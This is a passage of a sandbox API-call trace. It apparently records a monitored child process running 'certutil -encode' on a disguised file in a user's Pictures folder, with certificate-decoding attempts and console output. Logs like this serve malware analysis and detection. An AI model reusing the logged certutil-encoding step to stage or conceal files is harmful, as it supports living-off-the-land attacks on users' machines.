(hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0300.810] DllMain () returned 0x1 [0300.810] exit (_Code=0) Thread: id = 130 os_tid = 0x1300 Process: id = "52" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x2b82d000" os_pid = "0x1304" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"qH5GV-YJCqquRIYDQ_S.png.Sister\" \"qH5GV-YJCqquRIYDQ_S.png.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 131 os_tid = 0xecc [0301.199] GetStartupInfoW (in: lpStartupInfo=0x10d7ecfba0 | out: lpStartupInfo=0x10d7ecfba0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"qH5GV-YJCqquRIYDQ_S.png.Sister\" \"qH5GV-YJCqquRIYDQ_S.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0301.201] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0301.234] __set_app_type (_Type=0x1) [0301.234] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0301.234] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0301.237] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0301.237] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0301.237] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0301.238] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0301.238] WerSetFlags () returned 0x0 [0301.238] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0301.238] __iob_func () returned 0x7ffcea2dea00 [0301.238] _fileno (_File=0x7ffcea2dea30) returned 1 [0301.238] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0301.238] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0301.239] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0301.240] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0301.240] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0301.240] GetConsoleOutputCP () returned 0x1b5 [0301.241] _vsnwprintf (in: _Buffer=0x10d7ecfb10, _BufferCount=0xb, _Format=".%d", _ArgList=0x10d7ecfa38 | out: _Buffer=".437") returned 4 [0301.241] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0301.241] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.241] GetFileType (hFile=0x50) returned 0x2 [0301.242] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0301.242] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0301.242] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.243] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0301.243] GetCommandLineW () returned="certutil -encode \"qH5GV-YJCqquRIYDQ_S.png.Sister\" \"qH5GV-YJCqquRIYDQ_S.png.Cruel\"" [0301.243] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x11733b3b960 [0301.243] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x11733b2ce70 [0301.243] LocalFree (hMem=0x11733b3b960) returned 0x0 [0301.243] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x11733b2c0d0 [0301.243] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x11733b2c340 [0301.243] LocalFree (hMem=0x11733b2c0d0) returned 0x0 [0301.243] LocalFree (hMem=0x11733b2ce70) returned 0x0 [0301.243] LocalFree (hMem=0x0) returned 0x0 [0301.243] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0301.243] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0301.244] GetCommandLineW () returned="certutil -encode \"qH5GV-YJCqquRIYDQ_S.png.Sister\" \"qH5GV-YJCqquRIYDQ_S.png.Cruel\"" [0301.244] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x11733b3b8a0 [0301.244] GetSystemTime (in: lpSystemTime=0x10d7ecf800 | out: lpSystemTime=0x10d7ecf800*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0xf, wMilliseconds=0x310)) [0301.244] SystemTimeToFileTime (in: lpSystemTime=0x10d7ecf800, lpFileTime=0x10d7ecf7f8 | out: lpFileTime=0x10d7ecf7f8) returned 1 [0301.244] FileTimeToLocalFileTime (in: lpFileTime=0x10d7ecf7f8, lpLocalFileTime=0x10d7ecf7c0 | out: lpLocalFileTime=0x10d7ecf7c0) returned 1 [0301.244] FileTimeToSystemTime (in: lpFileTime=0x10d7ecf7c0, lpSystemTime=0x10d7ecf530 | out: lpSystemTime=0x10d7ecf530) returned 1 [0301.244] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x10d7ecf530, lpFormat=0x0, lpDateStr=0x10d7ecf640, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0301.244] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x10d7ecf530, lpFormat=0x0, lpTimeStr=0x10d7ecf540, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0301.244] _vsnwprintf (in: _Buffer=0x10d7ecf54e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x10d7ecf518 | out: _Buffer=" 15.784s") returned 8 [0301.244] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x11733b3e570 [0301.245] SetLastError (dwErrCode=0x80070716) [0301.245] _vsnwprintf (in: _Buffer=0x10d7ecf5c8, _BufferCount=0xb, _Format="%d", _ArgList=0x10d7ecf5b8 | out: _Buffer="948") returned 3 [0301.245] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x10d7ecf380, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0301.245] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x11733b3baa0 [0301.245] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x11733b33f20 [0301.245] LocalFree (hMem=0x11733b3e570) returned 0x0 [0301.245] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10d7ecf870 | out: lpSystemTimeAsFileTime=0x10d7ecf870*(dwLowDateTime=0xde2a3f5f, dwHighDateTime=0x1d6141f)) [0301.245] GetLocalTime (in: lpSystemTime=0x10d7ecf8a8 | out: lpSystemTime=0x10d7ecf8a8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0xf, wMilliseconds=0x312)) [0301.245] SystemTimeToFileTime (in: lpSystemTime=0x10d7ecf8a8, lpFileTime=0x10d7ecf880 | out: lpFileTime=0x10d7ecf880) returned 1 [0301.245] CompareFileTime (lpFileTime1=0x10d7ecf880, lpFileTime2=0x10d7ecf870) returned 1 [0301.245] _vsnwprintf (in: _Buffer=0x10d7ecf8b8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x10d7ecf848 | out: _Buffer="GMT + 2.00") returned 10 [0301.246] LocalFree (hMem=0x11733b3b8a0) returned 0x0 [0301.246] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde670000 [0301.246] FindResourceW (hModule=0x7ffcde670000, lpName=0x1, lpType=0x10) returned 0x7ffcde730090 [0301.246] LoadResource (hModule=0x7ffcde670000, hResInfo=0x7ffcde730090) returned 0x7ffcde7300b0 [0301.246] LockResource (hResData=0x7ffcde7300b0) returned 0x7ffcde7300b0 [0301.246] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0301.246] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x10d7ecf8e8 | out: _Buffer="10.0.15063.447") returned 14 [0301.246] GetACP () returned 0x4e4 [0301.246] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0301.246] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x11733b3bd20 [0301.246] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x11733b3bd20, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0301.246] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x11733b3e7f0 [0301.246] _vsnwprintf (in: _Buffer=0x11733b3e7f0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x10d7ecf938 | out: _Buffer="10.0.15063.447 retail") returned 21 [0301.246] LocalFree (hMem=0x11733b3bd20) returned 0x0 [0301.246] LocalFree (hMem=0x0) returned 0x0 [0301.247] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0301.247] GetACP () returned 0x4e4 [0301.247] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0301.247] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x11733b3bbe0 [0301.247] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x11733b3bbe0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0301.247] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x11733b3ea30 [0301.247] _vsnwprintf (in: _Buffer=0x11733b3ea30, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x10d7ecf938 | out: _Buffer="10.0.15063.447 retail") returned 21 [0301.247] LocalFree (hMem=0x11733b3bbe0) returned 0x0 [0301.247] LocalFree (hMem=0x0) returned 0x0 [0301.247] GetACP () returned 0x4e4 [0301.247] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0301.247] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x11733b3bbc0 [0301.247] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x11733b3bbc0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0301.247] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x11733b3e630 [0301.247] _vsnwprintf (in: _Buffer=0x11733b3e630, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x10d7ecf968 | out: _Buffer="10.0.15063.447 retail") returned 21 [0301.247] LocalFree (hMem=0x11733b3bbc0) returned 0x0 [0301.247] LocalFree (hMem=0x11733b3e7f0) returned 0x0 [0301.248] LocalFree (hMem=0x11733b3ea30) returned 0x0 [0301.248] LocalFree (hMem=0x11733b3e630) returned 0x0 [0301.248] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0301.248] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0301.248] GetStockObject (i=0) returned 0x900010 [0301.248] RegisterClassW (lpWndClass=0x10d7ecfa90) returned 0xc1a2 [0301.248] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2802c8 [0301.264] NtdllDefWindowProc_W () returned 0x0 [0301.264] NtdllDefWindowProc_W () returned 0x1 [0301.271] NtdllDefWindowProc_W () returned 0x0 [0301.281] UpdateWindow (hWnd=0x2802c8) returned 1 [0301.281] PostMessageW (hWnd=0x2802c8, Msg=0x400, wParam=0x0, lParam=0x11733b2217e) returned 1 [0301.281] GetMessageW (in: lpMsg=0x10d7ecfae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x10d7ecfae0) returned 1 [0301.281] TranslateMessage (lpMsg=0x10d7ecfae0) returned 0 [0301.282] DispatchMessageW (lpMsg=0x10d7ecfae0) returned 0x0 [0301.282] NtdllDefWindowProc_W () returned 0x0 [0301.282] GetMessageW (in: lpMsg=0x10d7ecfae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x10d7ecfae0) returned 1 [0301.282] TranslateMessage (lpMsg=0x10d7ecfae0) returned 0 [0301.282] DispatchMessageW (lpMsg=0x10d7ecfae0) returned 0x0 [0301.282] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x11733b26330 [0301.282] LocalAlloc (uFlags=0x0, uBytes=0x9e) returned 0x11733b24440 [0301.282] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0301.282] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0301.283] SetLastError (dwErrCode=0x80070716) [0301.283] _vsnwprintf (in: _Buffer=0x10d7ecf4e8, _BufferCount=0xb, _Format="%d", _ArgList=0x10d7ecf4d8 | out: _Buffer="465") returned 3 [0301.283] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x10d7ecf2a0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0301.283] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x11733b2c430 [0301.283] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0301.283] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0301.283] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x10d7ecf280, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0301.283] GetLastError () returned 0xcb [0301.284] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0301.284] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0301.284] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0301.284] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0301.284] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0301.284] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0301.284] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0301.284] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0301.284] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0301.284] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0301.284] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0301.284] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0301.284] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0301.284] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0301.284] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0301.284] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0301.284] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0301.284] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0301.284] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0301.284] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0301.284] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0301.284] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d7ecef48 | out: phkResult=0x10d7ecef48*=0x23c) returned 0x0 [0301.285] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x11733b2ad80 [0301.285] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x10d7ecf4b8, lpData=0x10d7ecf4e8, lpcbData=0x10d7ecf4b0*=0x4 | out: lpType=0x10d7ecf4b8*=0x0, lpData=0x10d7ecf4e8*=0x0, lpcbData=0x10d7ecf4b0*=0x4) returned 0x2 [0301.285] LocalFree (hMem=0x11733b2ad80) returned 0x0 [0301.285] RegCloseKey (hKey=0x23c) returned 0x0 [0301.285] LocalFree (hMem=0x0) returned 0x0 [0301.285] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x11733b4d960 [0301.302] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0301.302] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0301.302] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0301.302] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0301.302] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0301.302] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0301.302] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0301.302] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0301.302] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0301.302] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0301.303] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0301.303] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0301.303] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0301.303] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0301.303] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0301.303] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0301.303] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x11733b48800 [0301.303] GetComputerNameW (in: lpBuffer=0x11733b48800, nSize=0x10d7ecf4b0 | out: lpBuffer="NQDPDE", nSize=0x10d7ecf4b0) returned 1 [0301.303] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x10d7ecf480 | out: lpBuffer=0x0, nSize=0x10d7ecf480) returned 0 [0301.304] GetLastError () returned 0xea [0301.304] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x11733b3bb80 [0301.304] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x11733b3bb80, nSize=0x10d7ecf480 | out: lpBuffer="NQdPdE", nSize=0x10d7ecf480) returned 1 [0301.304] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0301.308] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x11733b53ad0, cbCertEncoded=0xb2c0) returned 0x0 [0301.312] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x11733b53ad0, cbCrlEncoded=0xb2c0) returned 0x0 [0301.312] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x11733b53ad0, cbEncoded=0xb2c0, dwFlags=0x8000, pDecodePara=0x10d7ecf360, pvStructInfo=0x10d7ecf3f0, pcbStructInfo=0x10d7ecf3e4 | out: pvStructInfo=0x10d7ecf3f0, pcbStructInfo=0x10d7ecf3e4) returned 0 [0301.313] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x11733b53ad0, cbEncoded=0xb2c0, dwFlags=0x8000, pDecodePara=0x10d7ecf360, pvStructInfo=0x10d7ecf3f0, pcbStructInfo=0x10d7ecf3e4 | out: pvStructInfo=0x10d7ecf3f0, pcbStructInfo=0x10d7ecf3e4) returned 0 [0301.313] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x11733b53ad0, cbEncoded=0xb2c0, dwFlags=0x8000, pDecodePara=0x10d7ecf360, pvStructInfo=0x10d7ecf3f0, pcbStructInfo=0x10d7ecf3e4 | out: pvStructInfo=0x10d7ecf3f0, pcbStructInfo=0x10d7ecf3e4) returned 0 [0301.313] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x11733b34dc0 [0301.322] CryptMsgUpdate (hCryptMsg=0x11733b34dc0, pbData=0x11733b53ad0, cbData=0xb2c0, fFinal=1) returned 0 [0301.322] GetLastError () returned 0x8009310b [0301.322] CryptMsgClose (hCryptMsg=0x11733b34dc0) returned 1 [0301.322] GetFileAttributesExW (in: lpFileName="qH5GV-YJCqquRIYDQ_S.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\qh5gv-yjcqquriydq_s.png.sister"), fInfoLevelId=0x0, lpFileInformation=0x10d7ecf410 | out: lpFileInformation=0x10d7ecf410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21af0bf0, ftCreationTime.dwHighDateTime=0x1d5e34b, ftLastAccessTime.dwLowDateTime=0x588a79a0, ftLastAccessTime.dwHighDateTime=0x1d5e6ef, ftLastWriteTime.dwLowDateTime=0x588a79a0, ftLastWriteTime.dwHighDateTime=0x1d5e6ef, nFileSizeHigh=0x0, nFileSizeLow=0xb2c0)) returned 1 [0301.323] _vsnwprintf (in: _Buffer=0x10d7ecf418, _BufferCount=0xb, _Format="%d", _ArgList=0x10d7ecf408 | out: _Buffer="359") returned 3 [0301.323] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x10d7ecf1d0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0301.323] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x11733b486b0 [0301.323] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.323] _vsnwprintf (in: _Buffer=0x10d7ece400, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x10d7ecf458 | out: _Buffer="Input Length = 45760") returned 20 [0301.323] GetFileType (hFile=0x50) returned 0x2 [0301.323] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x10d7ece400*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x10d7ece3b4, lpReserved=0x0 | out: lpBuffer=0x10d7ece400*, lpNumberOfCharsWritten=0x10d7ece3b4*=0x14) returned 1 [0301.325] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.325] _vsnwprintf (in: _Buffer=0x10d7ece400, _BufferCount=0x1ff, _Format="\n", _ArgList=0x10d7ecf458 | out: _Buffer="\n") returned 1 [0301.325] GetFileType (hFile=0x50) returned 0x2 [0301.325] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x10d7ece400*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x10d7ece3b4, lpReserved=0x0 | out: lpBuffer=0x10d7ece400*, lpNumberOfCharsWritten=0x10d7ece3b4*=0x1) returned 1 [0301.351] GetFileAttributesExW (in: lpFileName="qH5GV-YJCqquRIYDQ_S.png.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\qh5gv-yjcqquriydq_s.png.cruel"), fInfoLevelId=0x0, lpFileInformation=0x10d7ecf410 | out: lpFileInformation=0x10d7ecf410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde37cb6d, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xde37cb6d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xde3a3cad, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xf604)) returned 1 [0301.351] _vsnwprintf (in: _Buffer=0x10d7ecf418, _BufferCount=0xb, _Format="%d", _ArgList=0x10d7ecf408 | out: _Buffer="361") returned 3 [0301.351] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x10d7ecf1d0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0301.351] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x11733b48dd0 [0301.351] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.352] _vsnwprintf (in: _Buffer=0x10d7ece400, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x10d7ecf458 | out: _Buffer="Output Length = 62980") returned 21 [0301.352] GetFileType (hFile=0x50) returned 0x2 [0301.352] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x10d7ece400*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x10d7ece3b4, lpReserved=0x0 | out: lpBuffer=0x10d7ece400*, lpNumberOfCharsWritten=0x10d7ece3b4*=0x15) returned 1 [0301.353] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.353] _vsnwprintf (in: _Buffer=0x10d7ece400, _BufferCount=0x1ff, _Format="\n", _ArgList=0x10d7ecf458 | out: _Buffer="\n") returned 1 [0301.353] GetFileType (hFile=0x50) returned 0x2 [0301.353] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x10d7ece400*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x10d7ece3b4, lpReserved=0x0 | out: lpBuffer=0x10d7ece400*, lpNumberOfCharsWritten=0x10d7ece3b4*=0x1) returned 1 [0301.358] LocalFree (hMem=0x11733b53ad0) returned 0x0 [0301.360] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0301.360] _vsnwprintf (in: _Buffer=0x10d7ecf478, _BufferCount=0xb, _Format="%d", _ArgList=0x10d7ecf468 | out: _Buffer="2022") returned 4 [0301.360] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x10d7ecf230, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0301.360] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x11733b29f90 [0301.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.360] _vsnwprintf (in: _Buffer=0x10d7ece460, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", 